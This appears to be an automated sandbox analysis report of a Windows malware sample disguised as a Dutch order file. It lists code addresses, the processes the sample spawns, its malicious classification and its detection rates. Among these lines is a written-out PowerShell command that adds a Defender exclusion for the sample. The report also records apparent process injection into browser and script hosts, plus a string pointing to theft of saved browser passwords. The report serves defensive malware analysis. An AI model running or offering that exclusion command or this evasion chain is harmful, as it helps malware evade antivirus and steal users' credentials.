                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03309C325_2_03309C32
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03290C005_2_03290C00
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03330CB55_2_03330CB5
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334FCF25_2_0334FCF2
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03280CF25_2_03280CF2
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049AE4F612_2_049AE4F6
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049BF43F12_2_049BF43F
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049B244612_2_049B2446
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_048F146012_2_048F1460
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049C059112_2_049C0591
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0499D5B012_2_0499D5B0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0490053512_2_04900535
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049B757112_2_049B7571
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049B16CC12_2_049B16CC
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0491C6E012_2_0491C6E0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049BF7B012_2_049BF7B0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_048FC7C012_2_048FC7C0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0492475012_2_04924750
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0490077012_2_04900770
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049070C012_2_049070C0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049AF0CC12_2_049AF0CC
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049B70E912_2_049B70E9
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049BF0E012_2_049BF0E0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0490B1B012_2_0490B1B0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049C01AA12_2_049C01AA
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049B81CC12_2_049B81CC
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0499A11812_2_0499A118
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_048F010012_2_048F0100
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0498815812_2_04988158
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049CB16B12_2_049CB16B
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_048EF17212_2_048EF172
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0493516C12_2_0493516C
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049052A012_2_049052A0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0491B2C012_2_0491B2C0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049A12ED12_2_049A12ED
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049A027412_2_049A0274
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0494739A12_2_0494739A
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0490E3F012_2_0490E3F0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049C03E612_2_049C03E6
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049B132D12_2_049B132D
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_048ED34C12_2_048ED34C
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049BA35212_2_049BA352
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049A0CB512_2_049A0CB5
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049BFCF212_2_049BFCF2
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_048F0CF212_2_048F0CF2
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04900C0012_2_04900C00
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04979C3212_2_04979C32
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04918DBF12_2_04918DBF
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0491FDC012_2_0491FDC0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_048FADE012_2_048FADE0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0490AD0012_2_0490AD00
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049B1D5A12_2_049B1D5A
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04903D4012_2_04903D40
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049B7D7312_2_049B7D73
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04912E9012_2_04912E90
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049BCE9312_2_049BCE93
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04909EB012_2_04909EB0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049BEEDB12_2_049BEEDB
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049BEE2612_2_049BEE26
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04900E5912_2_04900E59
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04901F9212_2_04901F92
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049BFFB112_2_049BFFB1
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_048F2FC812_2_048F2FC8
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0490CFE012_2_0490CFE0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049BFF0912_2_049BFF09
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04920F3012_2_04920F30
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04942F2812_2_04942F28
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04974F4012_2_04974F40
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_048E68B812_2_048E68B8
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0492E8F012_2_0492E8F0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049038E012_2_049038E0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0496D80012_2_0496D800
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0490284012_2_04902840
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0490A84012_2_0490A840
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049029A012_2_049029A0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049CA9A612_2_049CA9A6
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0490995012_2_04909950
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0491B95012_2_0491B950
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0491696212_2_04916962
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_048FEA8012_2_048FEA80
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04945AA012_2_04945AA0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0499DAAC12_2_0499DAAC
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049ADAC612_2_049ADAC6
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049BFA4912_2_049BFA49
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049B7A4612_2_049B7A46
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04973A6C12_2_04973A6C
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0491FB8012_2_0491FB80
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049B6BD712_2_049B6BD7
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04975BF012_2_04975BF0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0493DBF912_2_0493DBF9
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049BAB4012_2_049BAB40
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_049BFB7612_2_049BFB76
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_00361EA012_2_00361EA0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0035B0B412_2_0035B0B4
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0035B0C012_2_0035B0C0
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0036555012_2_00365550
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0036376012_2_00363760
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0036375B12_2_0036375B
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0037BD3012_2_0037BD30
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0035CD5012_2_0035CD50
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0035CF7012_2_0035CF70
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0035AF7012_2_0035AF70
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0035AF6612_2_0035AF66
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0471E70C12_2_0471E70C
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0471D7D812_2_0471D7D8
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_047251EC12_2_047251EC
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0471E25512_2_0471E255
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0471E37812_2_0471E378
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0471E89C12_2_0471E89C
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0471CAB812_2_0471CAB8
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeCode function: 13_2_04BFD5A113_2_04BFD5A1
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeCode function: 13_2_04BDE5C113_2_04BDE5C1
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeCode function: 13_2_04BE6DC113_2_04BE6DC1
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeCode function: 13_2_04BDE7E113_2_04BDE7E1
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeCode function: 13_2_04BDC7E113_2_04BDC7E1
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeCode function: 13_2_04BDC7D713_2_04BDC7D7
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeCode function: 13_2_04BE4FD113_2_04BE4FD1
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeCode function: 13_2_04BE4FCC13_2_04BE4FCC
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeCode function: 13_2_04BE371113_2_04BE3711
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeCode function: 13_2_04BDC93113_2_04BDC931
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeCode function: 13_2_04BDC92513_2_04BDC925
                Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 0496EA12 appears 86 times
                Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 04935130 appears 36 times
                Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 0497F290 appears 105 times
                Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 048EB970 appears 268 times
                Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 04947E54 appears 96 times
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 0330F290 appears 105 times
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 032FEA12 appears 84 times
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 032C5130 appears 36 times
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 0327B970 appears 266 times
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: String function: 032D7E54 appears 88 times
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6096 -s 1612
                Source: Nieuwebestellingen10122024.exeStatic PE information: No import functions for PE file found
                Source: Nieuwebestellingen10122024.exe, 00000000.00000000.2035871116.000001DF34222000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameConsoleApplication2.exeH vs Nieuwebestellingen10122024.exe
                Source: Nieuwebestellingen10122024.exeBinary or memory string: OriginalFilenameConsoleApplication2.exeH vs Nieuwebestellingen10122024.exe
                Source: Nieuwebestellingen10122024.exe, -----.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@67/281@33/16
                Source: C:\Program Files\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\RecoveryJump to behavior
                Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6096
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:744:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:348:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yi2jc1cc.zkp.ps1Jump to behavior
                Source: Nieuwebestellingen10122024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Nieuwebestellingen10122024.exeStatic file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: wscript.exe, 0000000C.00000003.2555626623.0000000000903000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2548766694.00000000008D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4498888550.0000000000903000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2555391886.00000000008E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4498888550.00000000008D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2555626623.00000000008D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Nieuwebestellingen10122024.exeReversingLabs: Detection: 36%
                Source: Nieuwebestellingen10122024.exeVirustotal: Detection: 30%
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeFile read: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Nieuwebestellingen10122024.exe "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe"
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" -Force
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6096 -s 1612
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SysWOW64\wscript.exe"
                Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\IEXPLORE.EXE"
                Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5032 CREDAT:17410 /prefetch:2
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=1045c
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=1045c
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=2088,i,5847155238363767724,15255944632631986070,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5972 --field-trial-handle=2088,i,5847155238363767724,15255944632631986070,262144 /prefetch:8
                Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\IEXPLORE.EXE"
                Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5032 CREDAT:17416 /prefetch:2
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=1272 --field-trial-handle=2088,i,5847155238363767724,15255944632631986070,262144 /prefetch:8
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nieuwebestellingen10122024.exe" -ForceJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"Jump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SysWOW64\wscript.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\IEXPLORE.EXE" Jump to behavior
                Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5032 CREDAT:17410 /prefetch:2
                Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5032 CREDAT:17416 /prefetch:2
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=1045c
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=1045c
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=2088,i,5847155238363767724,15255944632631986070,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5972 --field-trial-handle=2088,i,5847155238363767724,15255944632631986070,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=1272 --field-trial-handle=2088,i,5847155238363767724,15255944632631986070,262144 /prefetch:8
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\IEXPLORE.EXE"
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
